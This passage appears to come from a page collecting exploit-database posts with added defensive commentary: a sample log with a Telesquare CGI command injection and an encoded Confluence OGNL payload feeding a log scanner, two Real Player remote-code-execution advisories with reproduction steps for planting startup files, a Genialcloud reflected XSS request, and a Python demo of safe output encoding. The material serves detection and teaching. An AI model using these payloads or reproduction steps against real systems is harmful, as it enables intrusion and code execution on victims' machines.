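203.0.113.5 - - [06/Jun/2022:10:00:01 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1" 200 211 "-" "python-requests/2.27"
203.0.113.9 - - [06/Jun/2022:10:00:02 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Jun/2022:10:00:03 +0000] "GET /cgi-bin/admin.cgi?Command=getStatus HTTP/1.1" 200 540 "-" "Mozilla/5.0"
198.51.100.8 - - [06/Jun/2022:10:00:04 +0000] "GET /display/DOC/Home HTTP/1.1" 200 9912 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

Decoding before matching matters: the Confluence payload reaches the log as `%24%7B...`, and a client could equally encode `Cmd=` for the Telesquare CGI, so rules that look at the raw line miss the obvious variants. The scanner is deliberately not a general OGNL detector; it is tuned to the two shapes shown on this page.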
23. # Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
# Google Dork: n/a
# Date: May 31, 2022
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://real.com/
# Software Link: http://real.com/
# Version: v.20.0.8.310
# Tested on: Windows 7, 8.1, 10
# CVE : N/A

Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE

The Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which is usually not safe because in some scenarios it could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS), which can potentially be used to e.g. steal cookies, among other things.

By setting the 'URL' parameter to a 'javascript:' URI and the 'target' parameter to an 'iframe' HTML element, it's possible to cause JavaScript code to run in the context of a local error page displayed after using the very same Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by the MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the case for '.mht' files; '.htm' files have their MIME type set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm', which belongs to the 'My Computer' security zone of IE / Windows, which allows reading of arbitrary local files and also arbitrary code execution by design.

Prohibiting the 'javascript:' URI in the control mitigates the issue.

The PoC uses the 'SYSMON' ActiveX control to plant an HTA file in the user's startup folder, which will be executed on next logon or boot. An HTA file can contain code to e.g. download or extract an embedded EXE file and run it.

The PoC assumes Real Player has its current working directory set to a subdirectory of the user's home directory. Upon downloading files using e.g. web browsers, they will be downloaded to the user's 'Downloads' folder by default, so we don't need to retrieve the Windows user name to be able to plant the HTA file in the startup folder. This is just for convenience purposes, as it's possible to retrieve this info in a variety of ways, including the MS Web Browser ActiveX.

The vulnerability can be exploited by opening a Real Player playlist file such as a RAM file.

To reproduce the issue, do the following:

a) Set up a web server.
b) On the web server root directory, extract the "RP_G2" folder to it.
c) Open the just-extracted "RP_G2" folder and then open the following files in a text editor: "poc.htm", "sm_rpx.js", "start.ram". Just replace every occurrence of the string %SERVER% with the actual web server's IP address (in each of the files).
d) Make sure the web server is accessible and all involved files too. On the MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME type "audio/x-pn-realaudio".
e) On the client side (victim), open the web browser and download the "start.ram" file (or it can be accessed e.g. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user's startup folder after a few seconds.

Note: to open the startup folder, open the "Run" menu and then type: shell:Startup
24. # Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
# Google Dork: n/a
# Date: May 31, 2022
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://real.com/
# Software Link: http://real.com/
# Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
# Tested on: Windows 7, 8.1, 10
# CVE : N/A

PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip
Video: https://youtu.be/CONlijEgDLc

Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special, application-specific means: the 'external' object, which exposes several custom methods and properties. The 'Import()' method is handled in an unsafe way regarding the 'Copy to My Music' parameter, which allows arbitrary file types to be downloaded; this could be unsafe, as only audio/image/video types should be allowed to be downloaded to the user's disk. Additionally, it does not properly sanitize file paths, allowing planting of arbitrary files in arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user closes the dialog box.

Additionally, when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait until reboot (true when the file is planted in the 'startup' folder).

The attacker needs to host the files to be copied/downloaded on an SMB or WebDAV share. The directory 'appdata' must be placed in the share's root.

The PoC will drop 'shdoclc.dll' (which has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes) into the user's 'windowsapps' folder and 'write.exe' into the 'startup' folder, so it works universally (any Windows version from at least XP up to 11).

Tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
25. # Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296

Reflected Cross-Site Scripting (XSS) vulnerability in the login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune", since the codebase seems shared with their other products: Facsys and Analysis) allows a remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. The affected request parameter is "msg".

PoC Request:

GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0

PoC Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet" ...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...
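The response above shows the reflected value landing inside a JavaScript string literal, a different output context from the Motopress finding (post 21), where the stored payload lands in HTML body text. Each context needs its own encoder, and the usual half-fix for the JS case, escaping only the quote, still loses to a payload that closes the `<script>` element because the HTML parser runs before the JS parser and ignores JS escapes. The following is an added example, not code from either product, that renders both contexts unsafely and then correctly; the page templates are constructed stand-ins, and the payloads are the ones shown in the two posts plus one `</script>` variant.

```python
"""Added example, not code from either product: the two output contexts behind
the Motopress (stored, HTML body) and Genialcloud (reflected, inside a
JavaScript string) findings above, rendered unsafely and then with
context-correct encoding. Templates are constructed stand-ins."""
import html
import json
import re

XSS_HTML = '"><script>alert("XSS")</script>'                          # Motopress PoC payload
XSS_JS = "Invalid username or password';alert(\"y0! XSS here :)\")//"  # decoded Genialcloud msg
XSS_JS_CLOSE = "x</script><script>alert(1)</script>"                    # defeats quote-only escaping


# --- HTML body context (Motopress title / excerpt) --------------------------
def render_title_unsafe(title: str) -> str:
    return f'<h2 class="entry-title">{title}</h2>'


def render_title_safe(title: str) -> str:
    # Entity-encode &, <, >, " and ' so the data can never open a tag.
    return f'<h2 class="entry-title">{html.escape(title, quote=True)}</h2>'


# --- JavaScript string context (Genialcloud: var Msg = '...') --------------
def render_msg_unsafe(msg: str) -> str:
    return f"<script>var Msg = '{msg}';</script>"


def render_msg_quote_only(msg: str) -> str:
    # A common half-fix: escape the quote and nothing else.
    escaped = msg.replace("'", "\\'")
    return f"<script>var Msg = '{escaped}';</script>"


def js_string_literal(value: str) -> str:
    """JSON-encode (quotes, backslashes, control chars; with the default
    ensure_ascii every non-ASCII char, U+2028/2029 included, becomes a
    \\uXXXX escape), then also escape < > & so the HTML parser never sees a
    closing </script> inside the literal."""
    s = json.dumps(value)
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_msg_safe(msg: str) -> str:
    return f"<script>var Msg = {js_string_literal(msg)};</script>"


# --- checks used by the demo ------------------------------------------------
SCRIPT_BODY = re.compile(r"<script>(.*?)</script>", re.I | re.S)
ONE_LITERAL = re.compile(r"^var Msg = ('(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\");$")


def script_is_intact(page: str) -> bool:
    """Emulate the HTML parser: a script ends at the first </script>. Then
    require exactly one script whose body is one assignment of one literal."""
    bodies = SCRIPT_BODY.findall(page)
    return len(bodies) == 1 and ONE_LITERAL.match(bodies[0]) is not None


def demo() -> dict:
    return {
        "title_unsafe_injected": "<script" in render_title_unsafe(XSS_HTML).lower(),
        "title_safe_injected": "<script" in render_title_safe(XSS_HTML).lower(),
        "msg_unsafe_intact": script_is_intact(render_msg_unsafe(XSS_JS)),
        "msg_quote_only_vs_js": script_is_intact(render_msg_quote_only(XSS_JS)),
        "msg_quote_only_vs_close": script_is_intact(render_msg_quote_only(XSS_JS_CLOSE)),
        "msg_safe_vs_js": script_is_intact(render_msg_safe(XSS_JS)),
        "msg_safe_vs_close": script_is_intact(render_msg_safe(XSS_JS_CLOSE)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:26s} {value}")
```

The result table makes the point: quote-only escaping happens to neutralise the exact Genialcloud payload but not the `</script>` variant, while `js_string_literal` holds against both, and `html.escape` with `quote=True` is what the Motopress title and excerpt needed.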